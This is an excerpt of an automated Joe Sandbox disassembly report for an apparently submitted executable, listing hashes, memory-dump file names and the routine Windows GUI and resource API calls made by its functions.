                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item
                                                                  • String ID:
                                                                  • API String ID: 369458955-0
                                                                  • Opcode ID: dcbe993a917b29286837bafa4e7dea382f1900e40664308f37de809ac8bb8215
                                                                  • Instruction ID: 07d9b4b1a600462046b36e9d23180db6b9a9f764909baecb8487adf63b030404
                                                                  • Opcode Fuzzy Hash: dcbe993a917b29286837bafa4e7dea382f1900e40664308f37de809ac8bb8215
                                                                  • Instruction Fuzzy Hash: DE018636541655BBCF232F629C04EAF3E59AF653A0F014122FD0455320DF32D9119BE5
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0020B86A
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0020B87F
                                                                  • IsWindow.USER32(?), ref: 0020B88D
                                                                  • SetWindowLongW.USER32(?,000000F0,?), ref: 0020B89D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID:
                                                                  • API String ID: 847901565-0
                                                                  • Opcode ID: fa9e640b32a09cf4f1d8e371b0b6aa0e37cfc410c9a796759b6c276dd0041007
                                                                  • Instruction ID: b9fc2b2404567fa569aeeaee83014421fdd2407cd1a198414ad7005ad36120a8
                                                                  • Opcode Fuzzy Hash: fa9e640b32a09cf4f1d8e371b0b6aa0e37cfc410c9a796759b6c276dd0041007
                                                                  • Instruction Fuzzy Hash: 7101D172114304BFDB11AB759C88E9AB7ACEF44330B200758F466E62E2DF30E8008A50
                                                                  APIs
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 001E8794
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 001E87A5
                                                                  • UpdateWindow.USER32(?), ref: 001E87AE
                                                                  • SetRectEmpty.USER32(?), ref: 001E87BB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EmptyInflateInvalidateUpdateWindow
                                                                  • String ID:
                                                                  • API String ID: 3040190709-0
                                                                  • Opcode ID: 867bede2d4b2097b2b7807c9bbf3c7e992eacaff510e521f15efd1803425b11f
                                                                  • Instruction ID: 794220e71c001a087ac34426d229c1b05e0a0185c43abedadfbf771fd8d8a139
                                                                  • Opcode Fuzzy Hash: 867bede2d4b2097b2b7807c9bbf3c7e992eacaff510e521f15efd1803425b11f
                                                                  • Instruction Fuzzy Hash: EC0196B15001059BCF00DFA9DCC9ADA7BBCFB09321F100265AD49AF0A6CF705945CF60
                                                                  APIs
                                                                  • FindResourceW.KERNEL32(?,?,000000F0), ref: 001DCAB8
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 001DCAC4
                                                                  • LockResource.KERNEL32(00000000), ref: 001DCAD1
                                                                  • FreeResource.KERNEL32(00000000,00000000), ref: 001DCAED
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLock
                                                                  • String ID:
                                                                  • API String ID: 1078018258-0
                                                                  • Opcode ID: 00be0153f45f5edbb9f405a981a2ce1cab9825bc21dee49a4f41789c3f9c211c
                                                                  • Instruction ID: 513dbac2216247d37de8f62aec83e7e0d246f0f786fd2bb478a8090d4a8e729f
                                                                  • Opcode Fuzzy Hash: 00be0153f45f5edbb9f405a981a2ce1cab9825bc21dee49a4f41789c3f9c211c
                                                                  • Instruction Fuzzy Hash: 12F0C23724125B6BC7119FE5ACC8E6FB6ACEF943A0705443ABA05A7341EF70DD01C6A0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00299D2C
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00299D93
                                                                  • SetCursor.USER32(00000000), ref: 00299D9A
                                                                  • DestroyIcon.USER32(00000000), ref: 00299DA6
                                                                    • Part of subcall function 002B87D9: __EH_prolog3.LIBCMT ref: 002B87E0
                                                                    • Part of subcall function 002B87D9: DeleteDC.GDI32(?), ref: 002B8802
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CursorH_prolog3$DeleteDestroyIconLoad
                                                                  • String ID:
                                                                  • API String ID: 2313811042-0
                                                                  • Opcode ID: 6c779b19436db6658df08a61d2f6f21faab959e0d39681afebfd476b2990106c
                                                                  • Instruction ID: 2a4d2492af68e3df100c60bc49002ad2de139bfcbe0c631eb494867f2a6f5c82
                                                                  • Opcode Fuzzy Hash: 6c779b19436db6658df08a61d2f6f21faab959e0d39681afebfd476b2990106c
                                                                  • Instruction Fuzzy Hash: 8E01A9302103409FCB65BF64C98ABAEBBA6AF50710F14040CE0AE4A2A2CFB16940CB61
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Parent$Focus
                                                                  • String ID:
                                                                  • API String ID: 384096180-0
                                                                  • Opcode ID: 4fb6c0d724aa15c209f0377aff1d377e3e3a504dd6ab2faca5df657d73e0e090
                                                                  • Instruction ID: 3829d2f845e8fe3064e80d4d608a2aa0577697caa0d64a69f09299982e35657c
                                                                  • Opcode Fuzzy Hash: 4fb6c0d724aa15c209f0377aff1d377e3e3a504dd6ab2faca5df657d73e0e090
                                                                  • Instruction Fuzzy Hash: E4F0ECB26107419FCB217776EC08A6B7BAABFD4311F06096AB48586661EF74D800CA50
                                                                  APIs
                                                                  • FindResourceW.KERNEL32(?,?,00000005,00000000,?,?,?,?,0021DAB9,?,?), ref: 0022F651
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,?,?,0021DAB9,?,?), ref: 0022F659
                                                                  • LockResource.KERNEL32(00000000,?,?,?,?,0021DAB9,?,?), ref: 0022F666
                                                                  • FreeResource.KERNEL32(00000000,00000000,0021DAB9,?,?,?,?,?,0021DAB9,?,?), ref: 0022F67E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLock
                                                                  • String ID:
                                                                  • API String ID: 1078018258-0
                                                                  • Opcode ID: a1d676b5f708da00d66cd3059209edae46027ea980d5d4289026dc83b778ecb7
                                                                  • Instruction ID: 05e3887804cc2ee51072cad0abd25b60ada968b9348143d2f9a5d526c7d74b7f
                                                                  • Opcode Fuzzy Hash: a1d676b5f708da00d66cd3059209edae46027ea980d5d4289026dc83b778ecb7
                                                                  • Instruction Fuzzy Hash: E5F09036501115BB87016BE5AD8CD9FBA6DDF952A07014029F60997261DA74CD008B60
                                                                  APIs
                                                                    • Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66
                                                                  • UpdateWindow.USER32(?), ref: 002A02E5
                                                                  • UpdateWindow.USER32(?), ref: 002A02F1
                                                                  • SetRectEmpty.USER32(?), ref: 002A02FD
                                                                  • SetRectEmpty.USER32(?), ref: 002A0306
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EmptyRectUpdate$Show
                                                                  • String ID:
                                                                  • API String ID: 1262231214-0
                                                                  • Opcode ID: 3ebabff35a5f4d4aeacddd107cb6985238add707ae281cb479c5be7695f217b8
                                                                  • Instruction ID: c0304cd947ef3ac08cbdc6d2b0d6fdb369d5705c699402d84a32658d3a21a406
                                                                  • Opcode Fuzzy Hash: 3ebabff35a5f4d4aeacddd107cb6985238add707ae281cb479c5be7695f217b8
                                                                  • Instruction Fuzzy Hash: ECF08C32260B159BE722AF25EC84F47B7E8BF85711F0A0569E5D8A7170CF71E811CAA0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: EmptyRect
                                                                  • String ID:
                                                                  • API String ID: 2270935405-0
                                                                  • Opcode ID: 7067d9f544fd870b1c9e2b448d6c2898b3337efe5153f45813ec9a1c26a1887a
                                                                  • Instruction ID: 998f6ddc9753d47cf184f8bc3421db027df468259a4b9b6354392cffe69af492
                                                                  • Opcode Fuzzy Hash: 7067d9f544fd870b1c9e2b448d6c2898b3337efe5153f45813ec9a1c26a1887a
                                                                  • Instruction Fuzzy Hash: 05E0C9B64007199AC730AB6AE884AC7B3ECAF94310B11091EE587C3514DB75F586CF90
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 002193A7
                                                                    • Part of subcall function 002186AD: __EH_prolog3_GS.LIBCMT ref: 002186B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3_Parent
                                                                  • String ID: 83/
                                                                  • API String ID: 383333065-2323854675
                                                                  • Opcode ID: 3020e922f02ffe43fec6b0793425d29f2350f4f2ba9f7c08efc97a68fc61e005
                                                                  • Instruction ID: 9533301757e19a4b93be7f1cbe6ab3012823481d1f1f1b7bdb650784c913e1fa
                                                                  • Opcode Fuzzy Hash: 3020e922f02ffe43fec6b0793425d29f2350f4f2ba9f7c08efc97a68fc61e005
                                                                  • Instruction Fuzzy Hash: D981A530310601AFDB15AF64C899AFEB7EAAF68740F04442EF55A8B291DF71A9D0CB51
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: __floor_pentium4
                                                                  • String ID: TR/
                                                                  • API String ID: 4168288129-3081264625
                                                                  • Opcode ID: 50427a281a5c2f6c1b0f593ea240900d4128fc95ee498b0d33daec387b89ea6b
                                                                  • Instruction ID: d23ce04919c075107ec29adbdd346b58865d1a703e729dba032d1dd59c0a84c1
                                                                  • Opcode Fuzzy Hash: 50427a281a5c2f6c1b0f593ea240900d4128fc95ee498b0d33daec387b89ea6b
                                                                  • Instruction Fuzzy Hash: 1C81D6B0E1060AEBCB05DFA4D1856EDBBB4FF44300F20C19EE995A6291DB31DB61CB90
                                                                  APIs
                                                                    • Part of subcall function 001DCDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,001D8A00,?,001D8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 001DCE0F
                                                                  • GetWindowRect.USER32(?,?), ref: 00216534
                                                                    • Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66
                                                                    • Part of subcall function 002157F1: IsWindowVisible.USER32(?), ref: 0021580D
                                                                    • Part of subcall function 002157F1: MapWindowPoints.USER32(?,?,?,00000002), ref: 00215846
                                                                    • Part of subcall function 002157F1: GetWindowLongW.USER32(?,000000F0), ref: 00215890
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$LongPointsRectShowVisible
                                                                  • String ID: 83/
                                                                  • API String ID: 705879729-2323854675
                                                                  • Opcode ID: 83e93fbdf595685d6711ae4f20779f291d76175125c906bc17fd2965c5918f50
                                                                  • Instruction ID: 032abb7c4d61046aae72a36453eff5540b97fe35ab217687d41a3e265e65ceea
                                                                  • Opcode Fuzzy Hash: 83e93fbdf595685d6711ae4f20779f291d76175125c906bc17fd2965c5918f50
                                                                  • Instruction Fuzzy Hash: 60811671A1021AAFCB18DFA8C9C99EEFBF5FB18314F10452DE515A7245CB31AD90CB64
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Parent
                                                                  • String ID: To/
                                                                  • API String ID: 975332729-3711964495
                                                                  • Opcode ID: 7dde3156e21412ac5fa7e0c1e6ba82ffa7732b91355ff6609325ee7a37915d32
                                                                  • Instruction ID: 71e5737921ba35d4501a37d12f63cfa4f7fdb19e547b23d93126eda7aa94c719
                                                                  • Opcode Fuzzy Hash: 7dde3156e21412ac5fa7e0c1e6ba82ffa7732b91355ff6609325ee7a37915d32
                                                                  • Instruction Fuzzy Hash: C661C675A04B019FC722AF32E46669A77E8FF59344F11492DD18AC2365FB31B860CF82
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 002143D8
                                                                    • Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88
                                                                    • Part of subcall function 0024ADE5: __EH_prolog3_GS.LIBCMT ref: 0024ADEF
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3_$Exception@8H_prolog3Throw_malloc
                                                                  • String ID: <L/$\w/
                                                                  • API String ID: 3649189929-1224564559
                                                                  • Opcode ID: b29f371995c9335eb91e782a99e6c360028c034b0f9ae40016fb4e7dab25a8ef
                                                                  • Instruction ID: 7f0faeeff4ee09df4512579d2e3014838aa537b726d38e24c375102a4b2a0551
                                                                  • Opcode Fuzzy Hash: b29f371995c9335eb91e782a99e6c360028c034b0f9ae40016fb4e7dab25a8ef
                                                                  • Instruction Fuzzy Hash: 73518170A102199BCF39AF248C82EE9B3F6AF75710F640299E51AA71D1DB309DD0CB50
                                                                  APIs
                                                                    • Part of subcall function 001DF457: GetModuleHandleW.KERNEL32(DWMAPI,?,?,00000000,?,?,?,?,?,?,?,?,00215927), ref: 001DF4CE
                                                                    • Part of subcall function 001DF457: GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 001DF4DE
                                                                    • Part of subcall function 001DEAAD: __EH_prolog3.LIBCMT ref: 001DEAB4
                                                                  • GetWindowRect.USER32(?,?), ref: 001DF890
                                                                  • SetWindowRgn.USER32(?,00000000,00000001), ref: 001DF8DD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AddressH_prolog3HandleModuleProcRect
                                                                  • String ID:
                                                                  • API String ID: 2106468464-3916222277
                                                                  • Opcode ID: a29eccdda434ff1d1f882f5e4af2ba05f83bfd3823f42aebb07464dca9765b77
                                                                  • Instruction ID: c2025bda7af308a5833e3da653226809ce89fdae3ecb9a0ecea014725db81e66
                                                                  • Opcode Fuzzy Hash: a29eccdda434ff1d1f882f5e4af2ba05f83bfd3823f42aebb07464dca9765b77
                                                                  • Instruction Fuzzy Hash: 94513730A00708EFCB26DF65C894AEEFBF5FF98344F20452FE85A96251DB309A41DA51
                                                                  APIs
